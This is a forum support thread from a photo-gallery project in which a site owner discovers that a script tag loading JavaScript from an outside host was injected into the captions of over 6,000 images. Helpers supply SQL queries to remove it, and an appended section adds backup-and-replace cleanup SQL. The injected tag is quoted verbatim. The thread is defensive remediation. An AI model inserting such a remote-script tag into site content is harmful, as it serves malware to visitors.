[Solved]: Avast warning about HTML:Script-inf

Started by redbjork, March 27, 2009, 12:43:01 AM


redbjork

Hello and thank you for a great product.

A couple of days ago I was struck with malware on my coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new

So I thought I had cleaned the site using winmerge and the guide plus upgrading to latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with a malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. Only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded avast and updated to latest version. And found some evil code

(attached file)
This is the interesting part
<!-- BEGIN caption -->
                                <tr>
                                        <td class="tableb"><center>
                                                <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
                                        </center></td>
                                </tr>
<!-- END caption -->

Problem is that I cannot find this code on my site (searched every file on site for this text without luck). This is generated somehow, from what I do not know.

Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0

Any assistance would be appreciated.

Nibbler

That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.

redbjork

Thank you so much  ;D
I opened my phpmyadmin and did a search on the address.
I found the following:
6027 match(es) inside table cpg149_pictures

Now I have a couple of questions.
1.   How do I clean this? I'm no expert in phpmyadmin, but I guess that I could individually remove each line of code 6027 times. I'm guessing there is a faster way.
2.   Does anyone know how this happened? Yes, this is lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of Coppermine, but now it's upgraded.
3.   How do I stop this from happening again? Any tip would be welcome.

I have included two files to assist you in your answers.
The exported cpg149_pictures database and myphpinfo from coppermine.

And thank you again.

Nibbler

Run this query in phpmyadmin to clean the captions:


UPDATE cpg149_pictures SET caption = ''

redbjork

If I run
UPDATE cpg149_pictures SET caption = ''
Doesn't that remove all the comments also? I just want to remove the bad code.

Thank you for the help again.

redbjork

Asked a friend that knows msql
He gave me this code to run

UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'

That worked like a charm   :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.

So now to question 2 and 3? Any ideas?

I just want everything to be up to specs. And for all other people that will or has the same problem.

Thank you for all your help, I'm impressed by the speed I received help.
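
As an added example (not part of the original thread): a more conservative version of the cleanup queries discussed above, which backs up the affected rows and strips only the injected tag instead of blanking the whole caption. The table name, the `caption` column and the script URL come from the thread; the `pid` key column is assumed from Coppermine's standard schema, and the backup table name is a made-up placeholder.

```sql
-- 1. Keep a copy of every caption that contains a script tag before changing
--    anything, so the payload can be inspected later and the change undone.
--    (cpg149_pictures_caption_backup is a placeholder name; pid is assumed
--    to be the primary key of the pictures table.)
CREATE TABLE cpg149_pictures_caption_backup AS
SELECT pid, caption
FROM cpg149_pictures
WHERE caption LIKE '%<script%';

-- 2. List the distinct injected values and how many rows carry each one.
--    More than one distinct payload means the exact-match cleanup in step 3
--    will not cover everything.
SELECT caption, COUNT(*) AS affected_rows
FROM cpg149_pictures
WHERE caption LIKE '%<script%'
GROUP BY caption
ORDER BY affected_rows DESC;

-- 3. Remove only the injected tag. Unlike SET caption = '', REPLACE() keeps
--    any legitimate caption text that surrounds the tag.
UPDATE cpg149_pictures
SET caption = REPLACE(
        caption,
        '<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>',
        '')
WHERE caption LIKE
      '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%';

-- 4. Verify. REPLACE() is case-sensitive and matches the string exactly, so
--    any variant of the tag (different case, spacing or URL) survives step 3
--    and shows up here. The expected result after a full cleanup is 0.
SELECT COUNT(*) AS remaining
FROM cpg149_pictures
WHERE caption LIKE '%<script%';
```

The same `LIKE '%<script%'` check can be run against the other free-text columns of the table to confirm that only `caption` was modified.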

Joachim Müller

The fields "caption" and comments posted on a file (residing in another table) are different animals.

redbjork

Ah ok, well I was unsure, so I guess both of the queries would have worked then. ::)